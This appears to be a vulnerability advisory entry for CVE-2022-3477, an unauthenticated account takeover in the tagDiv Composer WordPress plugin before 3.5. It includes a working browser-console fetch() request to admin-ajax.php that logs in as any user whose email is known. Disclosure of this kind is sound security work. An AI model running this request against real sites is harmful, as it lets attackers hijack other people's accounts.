Lucene search
Truoc Phan from Techlab CorporationWPEX-ID:993A95D2-6FCE-48DE-AE17-06CE2DB829EFHistoryOct 24, 2022 - 12:00 a.m.
tagDiv Composer < 3.5 - Unauthenticated Account Takeover
2022-10-2400:00:00
Truoc Phan from Techlab Corporation
175
tagdiv composer
unauthenticated
account takeover
exploit
unauthenticated user
developer console
ajax request
login.
0.003 Low
EPSS
Percentile
71.0%
The plugin, required by the themes, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=td_ajax_fb_login_user&user[email][email protected]',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Then refresh the page to be logged in as the user with the [email protected] email addressRelated
patchstack
patchstack
cve
cve
CVE-2022-3477
2022-11-14 15:15:49
wpvulndb
wpvulndb
tagDiv Composer < 3.5 - Unauthenticated Account Takeover
2022-10-24 00:00:00
cvelist
cvelist
CVE-2022-3477 tagDiv Composer < 3.5 - Unauthenticated Account Takeover
2022-11-14 00:00:00
prion
prion
Improper access control
2022-11-14 15:15:00
nvd
nvd
CVE-2022-3477
2022-11-14 15:15:49